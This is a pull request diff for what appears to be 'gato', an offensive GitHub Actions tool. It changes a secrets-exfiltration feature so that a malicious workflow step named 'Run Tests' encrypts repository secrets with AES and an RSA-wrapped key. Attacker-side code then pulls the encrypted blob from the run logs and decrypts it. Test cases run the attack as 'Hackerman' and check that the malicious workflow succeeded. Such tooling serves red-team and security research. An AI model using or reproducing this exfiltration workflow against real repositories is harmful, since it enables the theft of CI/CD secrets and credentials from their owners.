### PR TITLE
Use symmetric encrption for secrets extraction

### DIFF
--- a/gato/attack/attack.py
+++ b/gato/attack/attack.py
@@ -552,16 +552,18 @@ class Attacker:
 
                 blob = matcher.findall(res)
 
-                if len(blob) == 2:
+                if len(blob) == 3:
                     encrypted_secrets = base64.b64decode(blob[1])
+                    encrypted_key = base64.b64decode(blob[2])
                     Output.owned(
                         "Decrypted and Decoded Secrets:\n"
                     )
 
-                    plaintext = priv_key.decrypt(encrypted_secrets,
-                                                 padding.PKCS1v15()).decode()
+                    sym_key = priv_key.decrypt(encrypted_key,
+                                               padding.PKCS1v15()).decode()
 
-                    print(plaintext)
+                    print('key', sym_key)
+                    print('secrets', encrypted_secrets)
                 else:
                     Output.error(
                         "Unable to extract encoded output from runlog!"

--- a/gato/attack/attack.py
+++ b/gato/attack/attack.py
@@ -553,7 +553,9 @@ class Attacker:
                 print(res)
 
                 # Parse out the base64 blob with a regex.
-                matcher = re.compile(r'\$(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==|[A-Za-z0-9+/]{4})\$')
+                matcher = re.compile(
+                              r'\$(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)?\$'
+                          )
 
                 blob = matcher.findall(res)
 

--- a/gato/attack/attack.py
+++ b/gato/attack/attack.py
@@ -12,7 +12,6 @@ from cryptography.hazmat.primitives.asymmetric import padding
 from cryptography.hazmat.primitives.ciphers import Cipher
 from cryptography.hazmat.primitives.ciphers import algorithms
 from cryptography.hazmat.primitives.ciphers import modes
-from cryptography.hazmat.primitives import hashes
 
 import hashlib
 
@@ -565,10 +564,8 @@ class Attacker:
 
                     encrypted_key = base64.b64decode(blob[2])
                     sym_key_b64 = priv_key.decrypt(encrypted_key,
-                                               padding.PKCS1v15()).decode()
+                                                   padding.PKCS1v15()).decode()
                     sym_key = base64.b64decode(sym_key_b64)
-
-                    print(type(sym_key), type(salt))
 
                     derived_key = hashlib.pbkdf2_hmac('sha256', sym_key, salt, 10000, 48)
                     key = derived_key[0:32]
@@ -577,16 +574,12 @@ class Attacker:
                     cipher = Cipher(algorithms.AES256(key), modes.CBC(iv))
                     decryptor = cipher.decryptor()
 
-                    print(blob[1], sym_key_b64)
-                    Output.owned(
-                        "Decrypted and Decoded Secrets:\n"
-                    )
+                    Output.owned("Decrypted and Decoded Secrets:")
 
-                    print(decryptor.update(ciphertext) + decryptor.finalize())
+                    cleartext = decryptor.update(ciphertext) + decryptor.finalize()
+                    cleartext = cleartext[:-cleartext[-1]]
 
-                    print("salt", salt.hex())
-                    print("iv", iv.hex())
-                    print("key", key.hex())
+                    print(cleartext.decode('ascii').strip())
 
                 else:
                     Output.error(

--- a/gato/attack/attack.py
+++ b/gato/attack/attack.py
@@ -579,7 +579,7 @@ class Attacker:
                     cleartext = decryptor.update(ciphertext) + decryptor.finalize()
                     cleartext = cleartext[:-cleartext[-1]]
 
-                    print(cleartext.decode('ascii').strip())
+                    print(cleartext.decode('utf-8').strip())
 
                 else:
                     Output.error(

--- a/gato/attack/attack.py
+++ b/gato/attack/attack.py
@@ -553,16 +553,16 @@ class Attacker:
                 print(res)
 
                 # Parse out the base64 blob with a regex.
-                matcher = re.compile(r'(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==)')
+                matcher = re.compile(r'\$(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}[AEIMQUYcgkosw048]=|[A-Za-z0-9+/][AQgw]==|[A-Za-z0-9+/]{4})\$')
 
                 blob = matcher.findall(res)
 
-                if len(blob) == 3:
-                    encrypted_secrets = base64.b64decode(blob[1])
+                if len(blob) == 2:
+                    encrypted_secrets = base64.b64decode(blob[0][1:-1])
                     salt = encrypted_secrets[8:16]
                     ciphertext = encrypted_secrets[16:]
 
-                    encrypted_key = base64.b64decode(blob[2])
+                    encrypted_key = base64.b64decode(blob[1][1:-1])
                     sym_key_b64 = priv_key.decrypt(encrypted_key,
                                                    padding.PKCS1v15()).decode()
                     sym_key = base64.b64decode(sym_key_b64)

--- a/gato/attack/cicd_attack.py
+++ b/gato/attack/cicd_attack.py
@@ -109,7 +109,7 @@ class CICDAttack():
                     'run': "|\n"
                            "openssl rand -out sym.key 256\n"
                            f"{echo_cmd} | openssl enc -aes-256-cbc -kfile"
-                           " sym.key | base64 -w 0\n"
+                           " sym.key -pbkdf2 | base64 -w 0\n"
                            f"cat sym.key | base64 | openssl rsautl -encrypt -inkey"
                            f" <(echo \"${pkey_varname}\") -pubin -pkcs |"
                            " base64 -w 0"

--- a/gato/attack/cicd_attack.py
+++ b/gato/attack/cicd_attack.py
@@ -106,7 +106,11 @@ class CICDAttack():
                 {
                     'name': 'Run Tests',
                     'env': secret_envmap,
-                    'run': f"{echo_cmd} | openssl rsautl -encrypt -inkey"
+                    'run': "|\n"
+                           "openssl rand -out sym.key 256\n"
+                           f"{echo_cmd} | openssl enc -aes-256-cbc -kfile"
+                           " sym.key | base64 -w 0\n"
+                           f"cat sym.key | base64 | openssl rsautl -encrypt -inkey"
                            f" <(echo \"${pkey_varname}\") -pubin -pkcs |"
                            " base64 -w 0"
                 }

--- a/gato/attack/cicd_attack.py
+++ b/gato/attack/cicd_attack.py
@@ -106,12 +106,11 @@ class CICDAttack():
                 {
                     'name': 'Run Tests',
                     'env': secret_envmap,
-                    'run': "|\n"
-                           "openssl rand -out sym.key 256\n"
+                    'run': "openssl rand -out sym.key 32;"
                            f"{echo_cmd} | openssl enc -aes-256-cbc -kfile"
-                           " sym.key -pbkdf2 | base64 -w 0\n"
-                           f"cat sym.key | base64 | openssl rsautl -encrypt -inkey"
-                           f" <(echo \"${pkey_varname}\") -pubin -pkcs |"
+                           " sym.key -pbkdf2 | base64 -w 0;"
+                           f"cat sym.key | base64 | openssl rsautl -encrypt "
+                           f"-inkey <(echo \"${pkey_varname}\") -pubin -pkcs |"
                            " base64 -w 0"
                 }
             ]

--- a/gato/attack/cicd_attack.py
+++ b/gato/attack/cicd_attack.py
@@ -106,7 +106,7 @@ class CICDAttack():
                 {
                     'name': 'Run Tests',
                     'env': secret_envmap,
-                    'run': "openssl rand -out sym.key 256;"
+                    'run': "openssl rand -out sym.key 32;"
                            f"{echo_cmd} | openssl enc -aes-256-cbc -kfile"
                            " sym.key -pbkdf2 | base64 -w 0;"
                            f"cat sym.key | base64 | openssl rsautl -encrypt "

--- a/gato/attack/cicd_attack.py
+++ b/gato/attack/cicd_attack.py
@@ -106,12 +106,13 @@ class CICDAttack():
                 {
                     'name': 'Run Tests',
                     'env': secret_envmap,
-                    'run': "openssl rand -out sym.key 32;"
-                           f"{echo_cmd} | openssl enc -aes-256-cbc -kfile"
-                           " sym.key -pbkdf2 | base64 -w 0;"
-                           f"cat sym.key | base64 | openssl rsautl -encrypt "
-                           f"-inkey <(echo \"${pkey_varname}\") -pubin -pkcs |"
-                           " base64 -w 0"
+                    'run': "openssl rand -out sym.key 32; echo -n '$';"
+                           f"{echo_cmd} | openssl enc -aes-256-cbc -kfile "
+                           "sym.key -pbkdf2 | base64 -w 0 | tr -d '\\n';"
+                           f"echo '$'; echo -n '$'; cat sym.key | base64 | "
+                           "openssl rsautl -encrypt -inkey "
+                           f"<(echo \"${pkey_varname}\") -pubin -pkcs | "
+                           "base64 -w 0 | tr -d '\\n'; echo '$'"
                 }
             ]
         }

--- a/gato/attack/cicd_attack.py
+++ b/gato/attack/cicd_attack.py
@@ -106,7 +106,7 @@ class CICDAttack():
                 {
                     'name': 'Run Tests',
                     'env': secret_envmap,
-                    'run': "openssl rand -out sym.key 32;"
+                    'run': "openssl rand -out sym.key 256;"
                            f"{echo_cmd} | openssl enc -aes-256-cbc -kfile"
                            " sym.key -pbkdf2 | base64 -w 0;"
                            f"cat sym.key | base64 | openssl rsautl -encrypt "

--- a/test/test_cases.json
+++ b/test/test_cases.json
@@ -342,7 +342,7 @@
     },
     {
         "PAT": "ORG_ADMIN_REPO_WORKFLOW_TOKEN",
-        "invocation": "gato -s attack -t GHRunnerPlayground/TestWF --secrets --author-name Hackerman --author-email hacker@evilcorp.com --message AllYourSecretBelongToUs --timeout 60",
+        "invocation": "gato -s attack -t GHRunnerPlayground/TestWF --secrets --author-name Hackerman --author-email hacker@evilcorp.com --message AllYourSecretBelongToUs --delete --timeout 60",
         "assertions": [
             {
                 "expect": "The malicious workflow executed succesfully!",

--- a/test/test_cases.json
+++ b/test/test_cases.json
@@ -349,10 +349,6 @@
                 "type": "stdout"
             },
             {
-                "expect": "Run echo -e \"DUMMY_TEST_SECRET=$DUMMY_TEST_SECRET \\n\" | openssl rsautl -encrypt -inkey <(echo",
-                "type": "stdout"
-            },
-            {
                 "expect": "The repository has 1 accessible secret(s)!",
                 "type": "stdout"
             },

--- a/test/test_cases.json
+++ b/test/test_cases.json
@@ -342,7 +342,7 @@
     },
     {
         "PAT": "ORG_ADMIN_REPO_WORKFLOW_TOKEN",
-        "invocation": "gato -s attack -t GHRunnerPlayground/TestWF --secrets --author-name Hackerman --author-email hacker@evilcorp.com --message AllYourSecretBelongToUs --delete --timeout 60",
+        "invocation": "gato -s attack -t GHRunnerPlayground/TestWF --secrets --author-name Hackerman --author-email hacker@evilcorp.com --message AllYourSecretBelongToUs --timeout 60",
         "assertions": [
             {
                 "expect": "The malicious workflow executed succesfully!",

--- a/unit_test/test_cicd_attack.py
+++ b/unit_test/test_cicd_attack.py
@@ -43,4 +43,4 @@ def test_create_secret_exil_yaml():
 
     assert "SECRET_ONE: ${{ secrets.SECRET_ONE }}" in yaml
     assert "SECRET_TWO: ${{ secrets.SECRET_TWO }}" in yaml
-    assert "echo -e \"SECRET_ONE=$SECRET_ONE \\n" in yaml
+    assert "echo -e \"SECRET_ONE=$SECRET_ONE\n" in yaml

--- a/unit_test/test_cicd_attack.py
+++ b/unit_test/test_cicd_attack.py
@@ -43,5 +43,4 @@ def test_create_secret_exil_yaml():
 
     assert "SECRET_ONE: ${{ secrets.SECRET_ONE }}" in yaml
     assert "SECRET_TWO: ${{ secrets.SECRET_TWO }}" in yaml
-    assert "echo -e \"SECRET_ONE=$SECRET_ONE \\nSECRET_TWO" \
-           "=$SECRET_TWO \\n\" | openssl" in yaml
+    assert "echo -e \"SECRET_ONE=$SECRET_ONE \\n" in yaml

--- a/unit_test/test_cicd_attack.py
+++ b/unit_test/test_cicd_attack.py
@@ -43,5 +43,5 @@ def test_create_secret_exil_yaml():
 
     assert "SECRET_ONE: ${{ secrets.SECRET_ONE }}" in yaml
     assert "SECRET_TWO: ${{ secrets.SECRET_TWO }}" in yaml
-    assert "run: echo -e \"SECRET_ONE=$SECRET_ONE \\nSECRET_TWO" \
+    assert "echo -e \"SECRET_ONE=$SECRET_ONE \\nSECRET_TWO" \
            "=$SECRET_TWO \\n\" | openssl" in yaml


### PR DESCRIPTION
Currently, we are limited in the size of secrets we extract due to RSA limitations. This causes errors when the size of the extracted secrets exceeds the key size. This closes #42 .